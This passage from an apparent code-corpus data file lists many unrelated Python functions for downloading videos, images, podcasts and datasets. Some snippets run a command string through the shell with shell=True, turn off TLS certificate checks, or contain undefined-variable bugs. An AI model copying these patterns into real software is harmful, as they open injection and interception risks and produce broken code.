list:\n print('Starting process...')\n print('')\n\n year_month_filepath = []\n\n for link_info in valid_links:\n\n # Get file extension\n extension = link_info[0].split('.')[-1]\n\n # Link to download\n link_to_download = link_info[0]\n\n # Get month\n month = link_info[1]\n\n # Get year\n year = link_info[2]\n\n # Create a standard filename to save\n file_name = f'{year}-{month}.{extension}'\n\n print(f'Downloading... {link_to_download} Saving... {file_name}')\n\n # Create a link to save into ./file directory\n link_to_save = f'./file/{file_name}'\n\n # Download file and save it\n wget.download(link_to_download, out=link_to_save)\n\n\n # Special treatment to zip and xlsx file\n if extension == 'zip':\n\n # Get right link to save (.csv) from zip function\n link_to_save = get_file_into_zip(link_to_save)\n\n elif extension == 'xlsx':\n # Get right link to save (.csv) from xlsx function\n link_to_save = excel2csv(link_to_save)\n\n # Include the tuple into a list\n year_month_filepath.append((year, month, link_to_save))\n\n print('Finishing process...')\n\n return year_month_filepath", "def fetch_video_list (self, list_id, list_from=0, list_to=FETCH_VIDEO_REQUEST_COUNT):\n paths = [\n ['lists', list_id, {'from': list_from, 'to': list_to}, ['summary', 'title', 'synopsis', 'regularSynopsis', 'evidence', 'queue', 'episodeCount', 'info', 'maturity', 'runtime', 'seasonCount', 'releaseYear', 'userRating', 'numSeasonsLabel', 'bookmarkPosition', 'watched', 'videoQuality']],\n ['lists', list_id, {'from': list_from, 'to': list_to}, 'cast', {'from': 0, 'to': 15}, ['id', 'name']],\n ['lists', list_id, {'from': list_from, 'to': list_to}, 'cast', 'summary'],\n ['lists', list_id, {'from': list_from, 'to': list_to}, 'genres', {'from': 0, 'to': 5}, ['id', 'name']],\n ['lists', list_id, {'from': list_from, 'to': list_to}, 'genres', 'summary'],\n ['lists', list_id, {'from': list_from, 'to': list_to}, 'tags', {'from': 0, 'to': 9}, ['id', 'name']],\n ['lists', list_id, {'from': list_from, 'to': list_to}, 'tags', 'summary'],\n ['lists', list_id, {'from': list_from, 'to': list_to}, ['creators', 'directors'], {'from': 0, 'to': 49}, ['id', 'name']],\n ['lists', list_id, {'from': list_from, 'to': list_to}, ['creators', 'directors'], 'summary'],\n ['lists', list_id, {'from': list_from, 'to': list_to}, 'bb2OGLogo', '_400x90', 'png'],\n ['lists', list_id, {'from': list_from, 'to': list_to}, 'boxarts', '_342x192', 'jpg'],\n ['lists', list_id, {'from': list_from, 'to': list_to}, 'boxarts', '_1280x720', 'jpg'],\n ['lists', list_id, {'from': list_from, 'to': list_to}, 'storyarts', '_1632x873', 'jpg'],\n ['lists', list_id, {'from': list_from, 'to': list_to}, 'interestingMoment', '_665x375', 'jpg'],\n ['lists', list_id, {'from': list_from, 'to': list_to}, 'artWorkByType', 'BILLBOARD', '_1280x720', 'jpg']\n ]\n\n response = self._path_request(paths=paths)\n return self._process_response(response=response, component='Video list')", "def start(self):\n\n ydl_opts = {}\n with youtube_dl.YoutubeDL(ydl_opts) as ydl:\n while True:\n videos = self.get_videos() # getting list of all videos from file\n print('{} videos to go'.format(len(videos))) # print no. of video remaining\n video = get_first_item(videos) # get next video for downloading\n if video is None: # check if video is there or not\n break\n\n ydl.download([video]) # downloading video\n videos.remove(video) # remove video from list\n self.save_file(videos) # save updated list to file\n\n print('All downloaded')", "def get_videos_of_folder(folder):\n\n Settings.dev_print(\"getting videos of folder: {}\".format(folder.get_title()))\n if not folder: return []\n videos = []\n files = []\n valid_videos = [\".mp4\",\".mov\"]\n for f in os.listdir(folder.get_path()):\n ext = os.path.splitext(f)[1]\n if ext.lower() not in valid_videos:\n continue\n file = File()\n setattr(file, \"path\", os.path.join(folder.get_path(),f))\n files.append(file)\n Settings.maybe_print(\"video path: {}\".format(os.path.join(folder.get_path(),f)))\n return files", "def downloadAllVideos(train_csv_path, train_data_dir):\n\n vid2genre = {}\n with open(train_csv_path, 'r') as fin:\n lines = [line for line in fin.readlines() if not line.startswith('#')]\n print('start downloading %d videos' % len(lines))\n # use multiprocessing pool\n pool = multiprocessing.Pool(16)\n for i, line in enumerate(lines):\n # Extract the words consisting of video_id, start_time, end_time, list of video_tags\n words = [word.replace(\"\\n\", \"\").replace('\"', '') for word in line.replace(\" \", \"\").split(\",\")]\n words = words[0:3] + [words[3:]]\n video_id = words[0]\n vid2genre[video_id] = words[-1]\n pool.apply_async(download_vid, (line, train_data_dir))\n\n pool.close()\n pool.join()\n return vid2genre", "def downloadLocal(url_list,path):\n print(\"You are downloading {} images\".format(parser_arguments().limit),end=\" \");print(\"of {} class.\".format(parser_arguments().classes))\n print(\"Please, be patient :)\")\n for i in range(len(url_list)):\n filename= url_list[i].split(\"/\")[-1] # name of the picture file\n r = requests.get(url_list[i], stream =True)\n print(filename)\n\n with open(filename,'wb') as f : # create the file locally in binary-write mode\n r = requests.get(url_list[i], stream =True)\n shutil.copyfileobj(r.raw, f) #write our image to the file\n shutil.move(filename,path)\n print('Done!')", "def getVideoFilesFromFileList(filelist):\n videoFileList = []\n for videoFile in filenames:\n videoRoot, videoExt = os.path.splitext(videoFile)\n if videoExt in ['.mov', '.mp4', '.mkv', '.avi']:\n videoFileList.append(videoFile)\n return videoFileList", "def fetch_video_list(self, params):\n list_id = params.get('list_id', [''])[0]\n start = int(params.get('list_from', [0])[0])\n end = int(params.get('list_to', [26])[0])\n raw_video_list = self.netflix_session.fetch_video_list(\n list_id=list_id,\n list_from=start,\n list_to=end)\n if 'error' in raw_video_list:\n return raw_video_list\n # parse the video list ids\n if 'videos' in raw_video_list.get('value', {}).keys():\n video_list = self.netflix_session.parse_video_list(\n response_data=raw_video_list)\n return video_list\n return []", "def outputs(folderName):\n for i in itertools.count(1):\n yield io.open('%s/Video_%s.h264' %\n (folderName,\n datetime.now().strftime('%Y_%m_%d_%H_%M_%S')),\n 'wb')", "def podcast_download(self):\r\n warnings.filterwarnings(\"ignore\", category=UnicodeWarning)\r\n now = datetime.datetime.now()\r\n\r\n for podcast_file in self.podcast_list:\r\n published, name, link, title = podcast_file\r\n if self.podcast_list != []:\r\n line_file = (published + ';' + title + ';' + name + ';' + link).encode(\"utf-8\") \r\n if line_file in open(self.download_log).read():\r\n pass\r\n else:\r\n title = unicodedata.normalize('NFKD', title).encode('ascii', 'ignore')\r\n download_folder = os.path.join('downloads', title)\r\n if not os.path.exists(download_folder): \r\n os.makedirs(download_folder)\r\n try:\r\n published = str(parser.parse(published))[:10]\r\n except IOError as error:\r\n print 'Error' + (error) + ': File - ' + str(title)\r\n download_folder = os.path.join(download_folder, published)\r\n if not os.path.exists(download_folder): \r\n os.makedirs(download_folder)\r\n namefile_unicode = link[link.rfind('/')+1:]\r\n namefile_str = unicodedata.normalize('NFKD', \r\n namefile_unicode).encode('ascii', 'ignore')\r\n namefile_str = namefile_str.decode('utf-8', 'ignore').encode(\"utf-8\")\r\n if '.mp3' in namefile_str:\r\n len_name = namefile_str.index('.mp3')\r\n elif '.MP3' in namefile_str:\r\n len_name = namefile_str.index('.MP3')\r\n namefile_str = namefile_str[:len_name + 4]\r\n fileoutput = os.path.join(download_folder, namefile_str)\r\n name = unicodedata.normalize('NFKD', name).encode('ascii', 'ignore')\r\n print str(published) + '; ' + name\r\n ## downlink\r\n download_file(link, fileoutput) \r\n ## tagging\r\n mp3_tagging(fileoutput, podcast_file)\r\n ## write log\r\n write_file(self.download_log, line_file)\r\n end = datetime.datetime.now()\r\n print '\\r' + 'Download Time = ' + str(end-now) + '\\r'\r\n return None", "def run(self, thread_count=2):\n trycount = 10\n numprefix = '{0:0%dd}' % len(str(thread_count))\n vidprefix = '{0:0%dd}' % len(str(len(self.titles)))\n\n def downloader(thread_num):\n \"\"\"A thread that runs the download\"\"\"\n tid = 'Thread ' + numprefix.format(thread_num) + ': '\n for i in range(thread_num, len(self.titles), thread_count):\n title, link = self.titles[i], self.download_urls[i]\n name = vidprefix.format(i) + ' ' + title + '.mp4'\n tries = 0\n while (not os.path.exists(name) or os.path.getsize(name) == 0) \\\n and tries <= trycount:\n if os.path.exists(name): os.remove(name)\n self.log(tid + 'Calling wget for ' + name)\n subprocess.call(['wget', '--output-document=' + name, link])\n tries += 1\n if (not os.path.exists(name) or os.path.getsize(name) == 0):\n self.log(tid + 'wget failed for ' + name)\n else:\n self.log(tid + 'wget successfully downloaded ' + name)\n\n threads = []\n for i in range(thread_count):\n threads.append(threading.Thread(target=downloader, args=(i,)))\n self.log('Thread ' + numprefix.format(i) + ' created')\n\n for i in range(thread_count):\n threads[i].start()\n self.log('Thread ' + numprefix.format(i) + ' started')\n\n for t in threads: t.join()\n self.log('Threads terminated')\n self.log('Downloads completed')", "def create_task_list(path_list):\n current_video_id = Video.objects.all().aggregate(Max('video_id'))['video_id__max']\n if not current_video_id:\n current_video_id = 0\n\n task_list = []\n for (path, rating) in path_list:\n base_path = os.path.split(path)[0]\n if os.path.isfile(path):\n file_name = os.path.basename(path)\n if is_valid_video_file(path, file_name):\n video_id, current_video_id = next_video_id(current_video_id, path)\n task_list.append(ImportTask(video_id, base_path, path, rating))\n continue\n for (root, dirs, files) in os.walk(path):\n for file_name in files:\n try:\n file_path = os.path.join(root, file_name)\n if os.path.isdir(file_path):\n continue\n if is_valid_video_file(file_path, file_name):\n video_id, current_video_id = next_video_id(current_video_id, file_path)\n task_list.append(ImportTask(video_id, base_path, file_path, rating))\n except:\n log.error('#Error while proceeding: {0}'.format(file_name))\n exc_type, exc_value, exc_traceback = sys.exc_info()\n traceback.print_exception(exc_type, exc_value, exc_traceback, limit=2, file=sys.stdout)\n return task_list", "def download_video(video_url, output_path, output_name=\"\", default_type=\"mp4\", verbose=False):\n try:\n if \".\" not in output_name:\n output_name = f\"{output_name}.{default_type}\"\n output_path = os.path.join(output_path, output_name)\n api_response = core.get_request_with_retries(video_url)\n core_utils.print_if_verbose('Processing...', verbose)\n f = open(output_path, 'wb')\n for chunk in api_response.iter_content(chunk_size=255):\n # filter out keep-alive new chunks\n if chunk:\n f.write(chunk)\n core_utils.print_if_verbose(f'The video has been exported here: {output_path}', verbose)\n f.close()\n except Exception as exception_msg:\n print(f\"The video could not be downloaded due to the following error: {exception_msg}\")\n return", "def index():\n seen = set()\n seen_add = seen.add\n videos = []\n all_videos = mythVideo.searchVideos(insertedafter = '1900-01-01 00:00:00')\n\n for video in all_videos:\n path = video.filename.split('/')[0]\n if path not in seen and not seen_add(path):\n video.url = url_for('.with_path', path=path)\n video.label = path\n videos.append(video)\n\n videos = sorted(videos, key = lambda video: video.label.lowercase())\n return render_template('list.html', items = videos, page_title = 'Videos')", "def downloadvideo(filename):\n url = \"http://openings.moe/video/\" + filename\n f = getfile(url)\n safeprint(Colors.PURPLE + url + Colors.END + \":\\nSaving to --> \" + Colors.YELLOW + filename + Colors.END)\n with open(os.path.basename(url), \"wb\") as local_file:\n try:\n local_file.write(f.read())\n except IOError as e:\n safeprint(\"An error occurred while saving the file, try again. \" + str(e))", "async def get_videos(channel=None, limit=10, broadcasts=False):\n\tchannelid = get_user(name=channel or config[\"channel\"]).id\n\theaders = {\n\t\t'Client-ID': config['twitch_clientid'],\n\t\t'Authorization': f\"Bearer {get_token()}\",\n\t}\n\tdata = await common.http.request_coro(\"https://api.twitch.tv/helix/videos\", headers=headers, data={\n\t\t\"user_id\": channelid,\n\t\t\"first\": str(limit),\n\t\t\"sort\": \"time\",\n\t\t\"type\": \"archive\" if broadcasts else \"highlight\",\n\t})\n\treturn json.loads(data)[\"data\"]", "def get_videos_in_playlist(self):\n\n self.ydl = youtube_dl.YoutubeDL()\n # uses the youtube_dl as a context manager\n with self.ydl:\n self.result = self.ydl.extract_info(\n self.url, extra_info={'listformats': True}, download=False)\n for video in (self. result['entries']):\n video_id = video['id']\n self. url = f'https://www.youtube.com/watch?v={video_id}'\n self. show_formats()", "def download(query, destination='', max_items=None):\n destination = os.path.join(destination, query)\n eol_id = search(query)\n urls = []\n for idx, url in enumerate(get_images(eol_id)):\n filepath = os.path.join(destination, str(idx))\n data.download_image(url, filepath)\n print(idx)\n if max_items and idx >= max_items:\n break", "def with_path(path):\n seen = set()\n seen_add = seen.add\n videos = []\n all_videos = list(mythVideo.searchVideos(filename = path))\n\n for video in all_videos:\n if video.season > 0:\n video.label = video.title + \" - Season \" + str(video.season)\n\n if video.label not in seen and not seen_add(video.label):\n video.url = \"/videos/\" + video.title + \"/season/\" + str(video.season)\n videos.append(video)\n\n else:\n video.label = video.title + \" - \" + video.subtitle\n video.url = \"/videos/\" + video.title + \"/\" + video.hash\n videos.append(video)\n\n if len(videos) == 1:\n videos[0].pic = url_for('.video_image', title = title, hash = videos[0].hash)\n videos[0].feplay = url_for('.video_feplay', title = title, hash = hash)\n return render_template('recording.html', item = videos[0])\n\n videos = sorted(videos, key = lambda video: video.season)\n return render_template('list.html', items = videos, page_title = title)", "def download_feed_item(feed_item, base_directory):\n join_path = partial(os.path.join, base_directory)\n\n base_filename = base_filename_for_feed_item(feed_item)\n\n json_filename = join_path(\"{}.json\".format(base_filename))\n\n if os.path.exists(json_filename):\n # Stop here, we already have this video.\n return\n\n content = highest_quality_content(\n download_info_for_feed_item(feed_item)\n )\n\n video_content = (\n content[0]\n if isinstance(content, tuple) else\n content\n )\n\n assert video_content.media_type.has_video\n\n video_filename = join_path(\"{}.{}\".format(\n base_filename, video_content.media_type.file_type\n ))\n\n if os.path.exists(video_filename):\n # Delete the video file if it's there already.\n os.remove(video_filename)\n\n if isinstance(content, tuple):\n # Download video and audio at the same time.\n que = Queue()\n exception_queue = Queue()\n\n def download_in_queue():\n try:\n download_to_file(*que.get())\n except Exception as ex:\n exception_queue.put(ex)\n\n # TODO: It would be nice to be able to terminate the other\n # thread here.\n\n if isinstance(ex, (KeyboardInterrupt, SystemExit)):\n # Re-raise interrupts so cleanup code works.\n raise ex\n finally:\n que.task_done()\n\n temp_video_filename = tempfile.mkstemp(prefix= base_filename)[1]\n temp_audio_filename = tempfile.mkstemp(prefix= base_filename)[1]\n\n try:\n que.put((content[0].url, temp_video_filename))\n que.put((content[1].url, temp_audio_filename))\n\n for i in range(2):\n Thread(target= download_in_queue).start()\n\n que.join()\n\n if not exception_queue.empty():\n raise exception_queue.get()\n\n # Now use ffmpeg to join the audio and video content together.\n subprocess.check_call((\n \"ffmpeg\",\n \"-i\", temp_video_filename,\n \"-i\", temp_audio_filename,\n \"-c\", \"copy\", os.path.abspath(video_filename)\n ))\n finally:\n # Clean up temporary files.\n os.remove(temp_video_filename)\n os.remove(temp_audio_filename)\n else:\n # Download one audio-video file.\n download_to_file(video_content.url, video_filename)\n\n # Now write the JSOn file with the metadata.\n with open(json_filename, \"w\") as out_file:\n json.dump({\n \"version\": JSON_FORMAT_VERSION,\n \"content\": (\n [content[0].to_json(), content[1].to_json()]\n if isinstance(content, tuple) else\n [content.to_json()]\n ),\n \"feed_item\": feed_item.to_json(),\n }, out_file)\n\n return (video_filename, json_filename)", "async def videos(self, *, key: str, part: List[str], video_ids: List[str],\n max_results: int = 50, page_token: str = None,\n **kwargs):\n params = {\n 'key': key,\n 'id': ','.join(video_ids),\n 'part': ','.join(part),\n 'maxResults': max_results,\n }\n if page_token:\n params['pageToken'] = page_token\n\n return await self._request(kwargs.get('name'), params=params)", "def download_vid(item):\n vid_name, vid_id = item\n vid = Video(vid_name, vid_id, resolution='224p')\n vid.download()", "def run(self):\n urls_to_download = self._get_links()\n results = ThreadPool(8).imap_unordered(self._download_url, urls_to_download)\n for path in results:\n print(path)", "def download_media_from_bandwidth(media_urls):\n downloaded_media_files = []\n for media_url in media_urls:\n media_id = get_media_id(media_url)\n filename = get_media_filename(media_url)\n with open(filename, \"wb\") as f:\n try:\n downloaded_media = messaging_client.get_media(MESSAGING_ACCOUNT_ID, media_id)\n f.write(downloaded_media.body)\n except Exception as e:\n print(e)\n downloaded_media_files.append(filename)\n return downloaded_media_files", "def download_assignments(opener, fasta_fname, interval=3):\n params = {\"file\" : open(fasta_fname, \"rb\") }\n #submit and refresh until processed\n result = opener.open(rdp_base+servlet, params)\n while is_processing(result):\n sleep(interval)\n result = opener.open(rdp_base + check_page)\n\n #download the detailed text result\n result = opener.open(rdp_base + get_download_url(result))\n return result", "def show_video(path: str): \n video_path = sorted(glob(path + \"/*.mp4\"))[-1]\n video = io.open(video_path, 'r+b').read()\n encoded = base64.b64encode(video)\n\n return HTML(data='''<video alt=\"test\" controls>\n <source src=\"data:video/mp4;base64,{0}\" type=\"video/mp4\" /> </video>'''\n .format(encoded.decode('ascii')))", "def download(video_identifier,\n output_filename,\n num_attempts=5,\n url_base='https://www.youtube.com/watch?v='):\n # Defensive argument checking.\n assert isinstance(video_identifier, str), 'video_identifier must be string'\n assert isinstance(output_filename, str), 'output_filename must be string'\n assert len(video_identifier) == 11, 'video_identifier must have length 11'\n\n status = False\n\n if not os.path.exists(output_filename):\n command = [\n 'youtube-dl', '--quiet', '--no-warnings', '--no-check-certificate',\n '-f', 'mp4', '-o',\n '\"%s\"' % output_filename,\n '\"%s\"' % (url_base + video_identifier)\n ]\n command = ' '.join(command)\n print(command)\n attempts = 0\n while True:\n try:\n subprocess.check_output(\n command, shell=True, stderr=subprocess.STDOUT)\n except subprocess.CalledProcessError:\n attempts += 1\n if attempts == num_attempts:\n return status, 'Fail'\n else:\n break\n # Check if the video was successfully saved.\n status = os.path.exists(output_filename)\n return status, 'Downloaded'", "def download_urls(urls, path):\n count = 0\n if urls:\n for url in urls:\n try:\n res = requests.get(url, verify=False, stream=True)\n rawdata = res.raw.read()\n with open(os.path.join(path, 'img_' + str(count) + '.jpg'), 'wb') as f:\n f.write(rawdata)\n count += 1\n except Exception as e:\n print('Failed to write rawdata.')\n print(e)", "def download_files():\n #delete old files\n dataPath = Path(Path(os.getcwd()) / \"data\")\n for filename in dataPath.glob(\"*\"):\n os.unlink(filename)\n\n #download new files\n print(\"Downloading files...\")\n try:\n os.system(\"kaggle datasets download sudalairajkumar/novel-corona-virus-2019-dataset -f time_series_covid_19_confirmed.csv -p data -q\")\n os.system(\"kaggle datasets download sudalairajkumar/novel-corona-virus-2019-dataset -f time_series_covid_19_deaths.csv -p data -q\")\n os.system(\"kaggle datasets download sudalairajkumar/novel-corona-virus-2019-dataset -f time_series_covid_19_recovered.csv -p data -q\")\n print(\"Downloading files finished\")\n except:\n print(\"Error downloading files\")", "def interactive_download(url, file_path, **kwds):\n\n message = \"Downloading %s =>\\n %s\" % (url, os.path.abspath(file_path))\n\n # get size first just to verify server is listening and the file exists\n size = get_url_download_size(url)\n size_str = si_format(size, suffix='B')\n\n with ProgressBar(message, 1) as prg_bar:\n prg_bar.maximum = size\n\n last_update = time.time()\n last_size = None\n n_chunks = 0\n byte_rate = 0\n integration_const = 1.0\n \n for i, size, err in iter_download_with_resume(url, file_path, **kwds):\n now = time.time()\n complete_str = si_format(i, suffix='B', float_format='f', precision=2)\n total_str = si_format(size, suffix='B', float_format='f', precision=1)\n if err is None:\n if last_size is not None:\n chunk_size = i - last_size\n dt = now - last_update\n byte_rate = (chunk_size / dt) ** integration_const * byte_rate ** (1.0 - integration_const)\n # slower integration as more samples have been collected\n integration_const = max(1e-3, 1.0 / n_chunks)\n n_chunks += 1\n last_update = now\n last_size = i\n\n if byte_rate == 0:\n est_time_str = \"\"\n else:\n est_time = (size - i) / byte_rate\n est_time_str = str(datetime.timedelta(seconds=int(est_time)))\n\n rate_str = si_format(byte_rate, suffix='B/s', float_format='f')\n\n stat_str = '%0.2f%% (%s / %s) %s %s remaining' % (100.*i/size, complete_str, total_str, rate_str, est_time_str)\n else:\n stat_str = '%0.2f%% (%s / %s) [stalled; retrying...] %s' % (100.*i/size, complete_str, total_str, err)\n prg_bar.update(value=i, status=stat_str)", "def url_files_download(url, ext, outdir, check_exist=False, create_dir=False,\n remove_files=False, bar_opt='tqdm'):\n file_msg = fd.Program_Msg(__file__)\n ## Checking for file type\n # 'URL'\n if not isinstance(url, str):\n msg = '{0} `url` ({1}) is not a valid type. It must be a STRING!'\n msg = msg.format(file_msg, type(url))\n raise TypeError(msg)\n # File extension\n if not isinstance(ext, str):\n msg = '{0} `ext` ({1}) is not a valid type. It must be a STRING!'\n msg = msg.format(file_msg, type(ext))\n raise TypeError(msg)\n # Output directory\n if not isinstance(outdir, str):\n msg = '{0} `outdir` ({1}) is not a valid type. It must be a STRING!'\n msg = msg.format(file_msg, type(outdir))\n raise TypeError(msg)\n # `check_exist`\n if not (isinstance(check_exist, bool)):\n msg = '`check_exist` ({0}) must be of `boolean` type!'.format(\n type(check_exist))\n raise TypeError(msg)\n # `create_dir`\n if not (isinstance(create_dir, bool)):\n msg = '`create_dir` ({0}) must be of `boolean` type!'.format(\n type(create_dir))\n raise TypeError(msg)\n # `bar` - Type\n if not (isinstance(bar_opt, str)):\n msg = '`bar_opt` ({0}) must be of `boolean` type!'.format(\n type(bar_opt))\n raise TypeError(msg)\n # Progress bar - Value\n if not (bar_opt in ['tqdm', 'native']):\n msg = '{0} `bar_opt` ({1}) is not a valid option! Exiting'\n msg = msg.format(file_msg, bar_opt)\n raise LSSUtils_Error(msg)\n ##\n ## List of files in the URL\n files_arr = url_file_list(url, ext)\n # Creating directory\n if create_dir:\n cfutils.Path_Folder(outdir)\n # Check for its existence\n if check_exist:\n if not (os.path.exists(outdir)):\n msg = '`outdir` ({0}) was not found!'.format(\n outdir)\n raise FileNotFoundError(msg)\n ##\n ## Downloading files to output directory\n if len(files_arr) > 0:\n if (bar_opt == 'tqdm'):\n tqdm_desc = 'Downloading files: '\n for file_ii in tqdm(files_arr, desc=tqdm_desc):\n # Local file\n file_ii_local = os.path.join( outdir,\n os.path.basename(file_ii))\n # Checking if local file exists\n if os.path.exists(file_ii_local):\n if remove_files:\n os.remove(file_ii_local)\n wget_opt = True\n else:\n wget_opt = False\n else:\n wget_opt = True\n ##\n ## Only downloading if necessary\n if wget_opt:\n wget.download(file_ii, out=outdir, bar=None)\n elif (bar_opt == 'native'):\n for file_ii in files_arr:\n # Local file\n file_ii_local = os.path.join( outdir,\n os.path.basename(file_ii))\n # Checking if local file exists\n if os.path.exists(file_ii_local):\n if remove_files:\n os.remove(file_ii_local)\n wget_opt = True\n else:\n wget_opt = False\n else:\n wget_opt = True\n ##\n ## Only downloading if necessary\n if wget_opt:\n wget.download(file_ii, out=outdir)\n else:\n msg = '{0} Number of files is ZERO!'.format(file_msg)\n print(msg)", "def merge(vidlist,weekNumber):\n #generate day for file name\n today = date.today()\n d = today.strftime(\"%Y_%m_%d\")\n #resizing video\n clips = []\n for vid in vidlist:\n if vid.endswith(\".mp4\"):\n video = VideoFileClip(vid)\n ratio = video.h / video.w\n if ratio < (16/9 - 0.01):\n video = video.resize(width=1080)\n else:\n video = video.resize(height=1920)\n clips.append(video)\n finalrender = concatenate_videoclips(clips,method='compose')\n finalrender.write_videofile(str(weekNumber)+'.mp4',codec='libx264')", "def capture_timelapse(self, count, interval):\n filename = self.get_new_photo_filename('_{0:03d}_{1:03d}')\n for i in range(count):\n open(self.camid + '/' + filename.format(i, count), 'wb').write(\n self.fake_shot)\n time.sleep(interval)\n return filename.format(0, count)", "def request_videos(query, API_KEY, publishedBefore, publishedAfter, maxResults=49, driver_path=\"C:/WebDriver/bin/chromedriver.exe\"):\n \n video_list = yt_search(query, API_KEY, publishedBefore, publishedAfter, maxResults)\n \n # Check if there are no video results\n if not video_list:\n return\n \n for video in video_list:\n video['query'] = query\n return video_list", "async def download_files(self, download_path):\n\n async with vt.Client(self.apikey) as client:\n while True:\n file_hash = await self.queue.get()\n file_path = os.path.join(download_path, file_hash)\n with open(file_path, \"wb\") as f:\n await client.download_file_async(file_hash, f)\n self.queue.task_done()", "def execution(path_channel_data_base_json, path_playlist_ids_json, latest_date, oldest_date, api_service,\n selected_category, short_vid_index, long_vid_index, min_dur_long_vid=10, delay=True):\n today_date = datetime.today()\n\n log = f\"Date of execution: {today_date:%Y-%m-%d %H:%M:%S}\\n\" \\\n f\"Latest Date: {latest_date:%Y-%m-%d %H:%M:%S}\\n\" \\\n f\"Oldest Date: {oldest_date:%Y-%m-%d %H:%M:%S}\\n\\n\"\n\n print(log)\n\n music_channels = get_channel_list(path_channel_data_base_json, category=selected_category)\n playlist_ids = read_json(path_playlist_ids_json)\n\n all_vid = get_all_videos(music_channels, latest_date=latest_date, oldest_date=oldest_date, api_service=api_service)\n log += f'{all_vid[\"log_str\"]}\\n'\n\n duration_list = api_get_videos_duration(all_vid[\"all_video_ids\"], api_service)\n\n duration_filter_dict = duration_filter(duration_list, minute_threshold=min_dur_long_vid)\n log += f'{duration_filter_dict[\"logs\"]}\\n'\n\n print(\"Adding videos into playlists...\\n\")\n log += \"Adding videos into playlists...\\n\\n\"\n\n log_short_vid_text = api_add_to_playlist(playlist_ids[short_vid_index], duration_filter_dict[\"short_videos\"],\n api_service, delay=delay)\n log += f'{log_short_vid_text}\\n'\n\n log_long_vid_text = api_add_to_playlist(playlist_ids[long_vid_index], duration_filter_dict[\"long_videos\"],\n api_service, delay=delay)\n log += f'{log_long_vid_text}\\n'\n\n print(\"- ALL DONE! -\\n\")\n log += \"- ALL DONE! -\\n\"\n\n log += f\"\\n{clean_logs('../Logs')}\"\n\n with open(f'../Logs/Log_{today_date:%Y-%m-%d_%H.%M.%S}.txt', 'w', encoding=\"utf-8\") as file:\n file.write(log)\n\n sleep(5)\n\n webbrowser.open(f\"https://www.youtube.com/playlist?list={playlist_ids[short_vid_index]}\")\n webbrowser.open(f\"https://www.youtube.com/playlist?list={playlist_ids[long_vid_index]}\")", "def get_video_urls(self, kulu_id, retry=True):\n mp4_url = None\n hls_url = None\n if (kulu_id):\n def fetch_kulu_urls(kulu_id):\n mp4_url = None\n hls_url = None\n kulu_valley_kulus_url = \"https://imd.kuluvalley.com/api/2.1/rest/kulus/\"\n r = requests.get(kulu_valley_kulus_url + kulu_id)\n if (r.status_code == requests.codes.ok):\n o = r.json()\n variants = o[\"kulu\"][\"media\"][\"variants\"]\n for variant in variants:\n if (variant[\"formatCode\"] == \"hls_default\"):\n hls_url = variant[\"url\"]\n if (variant[\"formatCode\"] == \"mobile_mp4\"):\n mp4_url = variant[\"url\"]\n\n log.info(\"hls_url = %s\", hls_url)\n log.info(\"mp4_url = %s\", mp4_url)\n r.raise_for_status()\n return mp4_url, hls_url\n\n log.info(\"getting kulu valley urls\")\n mp4_url, hls_url = fetch_kulu_urls(kulu_id)\n\n if retry:\n retry_count = 1\n max_retries = 1\n while (retry_count <= max_retries and (mp4_url is None or hls_url is None)):\n log.info(\"getting kulu valley urls: retry %d\", retry_count)\n sleep_for = 2 ** (retry_count-1) # 1, 2, 4.. seconds\n log.info(\"sleeping for %.1f seconds\", sleep_for)\n time.sleep(sleep_for)\n mp4_url, hls_url = fetch_kulu_urls(kulu_id)\n retry_count += 1\n\n return mp4_url, hls_url", "def get_video_as_images():\n experiments = ['me1.mp4']\n try:\n if (os.path.isdir(\"dump\")):\n shutil.rmtree('dump')\n except OSError:\n print (\"Deletion of the directory failed\")\n exit()\n os.system('mkdir dump')\n for experiment in experiments:\n exp_no_ext = experiment.split('.')[0]\n subdir_cmd = \"dump/{0}\".format(exp_no_ext)\n os.mkdir(subdir_cmd)\n os.system('ffmpeg -i videos/%s dump/%s/%s%%03d.jpg' % (experiment, exp_no_ext, exp_no_ext))\n run_all(exp_no_ext)", "def download_remote_files(output_dir, files):\n logging.debug(f\"Try to download files: {files}\")\n\n # Create list of remote and local files\n base_url = \"https://storage.googleapis.com/\"\n urls = [base_url+file for file in files]\n local_files = [output_dir + file.split(\"/\")[-1] for file in files]\n\n\n async def get(session, url, local_f):\n if os.path.isfile(local_f):\n logging.info(\"Raw file {} exists locally\".format(local_f))\n pass\n else:\n # Download file\n async with session.get(url=url) as response:\n if response.status == 200:\n resp = await response.read()\n with open(local_f, \"wb\") as outfile:\n outfile.write(resp)\n\n\n async def main(urls, local_files):\n conn = aiohttp.TCPConnector(limit=30)\n timeout = aiohttp.ClientTimeout(total=None, connect=None, sock_connect=30, sock_read=10)\n async with aiohttp.ClientSession(connector=conn, timeout=timeout) as session:\n _ = await asyncio.gather(*[get(session, urls[f], local_files[f]) for f in range(len(urls))])\n\n asyncio.run(main(urls, local_files))\n return local_files", "def ssh_download_files(data):\n with _ssh_connect() as ssh:\n with ssh.open_sftp() as sftp:\n with click.progressbar(data, label='downloads') as items: # noqa\n for item in items:\n _, filename = os.path.split(item)\n sftp.get(item, f'{DOWNLOAD_DIR}/{filename}')", "def build_extracted_list(input_list, subinterval):\n out = []\n wait = subinterval\n for i in input_list:\n if wait == subinterval:\n out.append(i)\n wait = 0\n else:\n wait += 1\n return out", "def download_songs(playlist_url):\n command_string = 'youtube-dl -x --audio-format wav --postprocessor-args \"-ar 44100 -ac 1\" --output \"Songs/%(' \\\n 'title)s_%(id)s.%(ext)s\" ' + \\\n playlist_url\n args = shlex.split(command_string)\n subprocess.call(args)", "def videoIndexFile(request, flightName=None, sourceShortName=None, segmentNumber=None):\n\n # use regex substitution to replace hostname, etc.\n forceEndlistArg = request.GET.get('forceEndlist', None)\n forceEndlist = True if forceEndlistArg else False\n (indexFileContents, indexFilePath) = util.getIndexFileContents(flightName, sourceShortName,\n segmentNumber, forceEndlist=forceEndlist)\n if not indexFileContents:\n return JsonResponse({'status': 'fail', 'exception': 'NO INDEX FILE CONTENTS'}, status=406)\n # return modified file in next line\n response = HttpResponse(indexFileContents, content_type=\"application/x-mpegurl\")\n content_disposition = 'filename = \"%s\"' % os.path.basename(indexFilePath)\n response['Content-Disposition'] = content_disposition\n return response", "def download_pics(pics_links):\n\n for link in range(len(pics_links)):\n r = requests.get(pics_links[link][0])\n with open(os.path.join(\"tmp\", f\"{link}.jpg\"), \"wb\") as dl:\n dl.write(r.content)", "def download_ostrich_video(download_to_path):\n urlretrieve(REMOTE_OSTRICH_VID_PATH, download_to_path)", "def 